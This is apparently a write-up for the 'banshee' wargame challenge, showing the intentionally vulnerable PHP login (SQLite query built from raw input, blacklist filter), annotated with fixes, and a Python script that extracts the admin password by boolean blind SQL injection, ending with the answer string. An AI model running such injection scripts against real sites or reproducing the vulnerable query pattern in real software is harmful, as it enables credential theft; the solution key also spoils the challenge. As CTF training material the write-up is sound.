<?php
// Challenge source ("banshee"): a deliberately vulnerable login that shows why
// request input interpolated into SQL cannot be made safe by a keyword blacklist.
include "./config.php";
login_chk();
// Legacy ext/sqlite API (sqlite_open / sqlite_query / sqlite_fetch_array);
// removed in PHP 5.4, so this listing only runs on an old interpreter.
$db = sqlite_open("./db/banshee.db");
// Blacklist: rejects "sqlite", "member" and "_" (case-insensitive) in pw.
// It does not reject the single quote or the "--" comment sequence, so a
// value can still close the string literal and truncate the statement.
// The real fix is parameterisation, not a longer pattern list.
if(preg_match('/sqlite|member|_/i', $_GET[pw])) exit("No Hack ~_~");
// Unquoted array key (pw) relies on the bare-word-to-string fallback, which is a
// notice/warning on older PHP and an Error on PHP 8. The interpolation itself is
// the injection point; a prepared statement with a bound parameter would remove it.
$query = "select id from member where id='admin' and pw='{$_GET[pw]}'";
// Echoing the final statement leaks the exact SQL shape to the client;
// production code should never reflect a query back.
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = sqlite_fetch_array(sqlite_query($db,$query));
// The success message depends only on whether a row came back, i.e. a
// true/false oracle: the same response logic a blind-injection detector
// (many near-identical requests differing only in pw) would look for in logs.
if($result['id']) echo "<h2>login success!</h2>";
$query = "select pw from member where id='admin'";
$result = sqlite_fetch_array(sqlite_query($db,$query));
// Strict comparison with the stored value: the challenge is solved only when
// the actual pw is supplied, not merely when the injected query returns a row.
if($result['pw'] === $_GET['pw']) solve("banshee");
highlight_file(__FILE__);
?>
id가 존재하면 login success!가 출력되는 것을 기반으로 Blind SQL Injection을 수행한다.
SQLite 한 줄 주석은 --이다.
import requests
# Writeup-specific target and session cookie. The cookie value is a
# placeholder ("your own session id" in Korean) that the reader replaces.
url='https://los.rubiya.kr/chall/banshee_ece938c70ea2419a093bb0be9f01a7b1.php'
cookie={'PHPSESSID':'자신의 세션 id'}
# Alphabet tried one position at a time: the stored value is compared in its
# hex() form, so only these 16 symbols can occur.
HEX='0123456789ABCDEF'
# 16 -- length of hex(pw) that find_pw_len() reported when the writeup was made
def find_pw_len():
    """Return the length of hex(pw) for the admin row.

    Uses the page as a boolean oracle: "login success!" is printed only when
    the injected predicate holds (see the PHP source above), and the filter
    blocks neither the quote nor the ``--`` comment. One request per candidate
    length. NOTE: there is no upper bound, so this loops forever when no length
    ever matches (e.g. an invalid session cookie).
    """
    pw_len=1
    while True:
        r=requests.get(url+"?pw=' or id='admin' and length(hex(pw))={} --".format(pw_len),cookies=cookie)
        if 'login success!' in r.text:
            return pw_len
        else:
            pw_len+=1
#0313091b
def find_pw():
    """Recover pw from the same true/false oracle, one hex digit at a time.

    For each position of hex(pw) the 16 candidates in HEX are tried; once two
    digits are matched they are decoded to one byte and printed immediately.
    Every byte costs up to 32 requests to the same endpoint differing only in
    the pw parameter -- the traffic shape a WAF or log review flags, and the
    reason the server-side fix (a parameterised query) matters.
    """
    pw_len=find_pw_len()
    tmp=''
    for i in range(1,pw_len+1):
        for j in HEX:
            r=requests.get(url+"?pw=' or id='admin' and substr(hex(pw),{},1)='{}' --".format(i,j),cookies=cookie)
            if 'login success!' in r.text:
                tmp+=j
                # Two hex digits == one byte; flush it and start the next pair.
                if len(tmp)==2:
                    print(chr(int(tmp,16)),end='')
                    tmp=''
                break
# Script entry point: prints the recovered value character by character.
find_pw()
답: ?pw=0313091b